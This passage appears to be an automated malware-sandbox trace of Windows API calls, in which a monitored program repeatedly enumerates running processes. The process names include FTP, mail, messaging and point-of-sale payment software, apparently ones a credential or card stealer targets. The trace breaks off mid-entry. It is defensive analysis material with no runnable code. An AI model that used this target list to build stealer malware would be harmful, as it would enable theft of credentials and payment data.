Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0251.317] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0251.320] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0251.325] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0251.328] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0251.331] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0251.408] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0251.412] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0251.414] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0251.418] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0251.420] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0251.423] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0251.426] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0251.429] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0251.432] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0251.434] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0251.437] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0251.441] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0251.488] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0251.491] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0251.494] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0251.497] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0251.500] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0251.503] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0251.505] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0251.508] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0251.510] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0251.513] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0251.516] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0251.518] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0251.521] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0251.528] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0251.530] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0251.533] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0251.536] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0251.540] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0251.543] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0251.549] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0251.553] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0251.555] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0251.557] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.559] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.561] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0251.562] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.564] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0251.571] CloseHandle (hObject=0x2340) returned 1 [0251.571] Sleep (dwMilliseconds=0x64) [0251.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0251.698] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.700] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.701] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.703] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.704] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.706] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.708] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.709] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.711] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.713] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.715] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.716] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.718] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.719] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.758] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.761] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.763] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.764] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.766] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.768] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0251.769] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0251.771] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.774] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0251.776] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.778] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0251.779] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0251.780] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0251.782] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0251.784] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0251.785] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0251.787] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.789] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.790] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0251.792] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.835] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.838] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.840] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.843] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0251.846] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0251.848] Process32Next (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 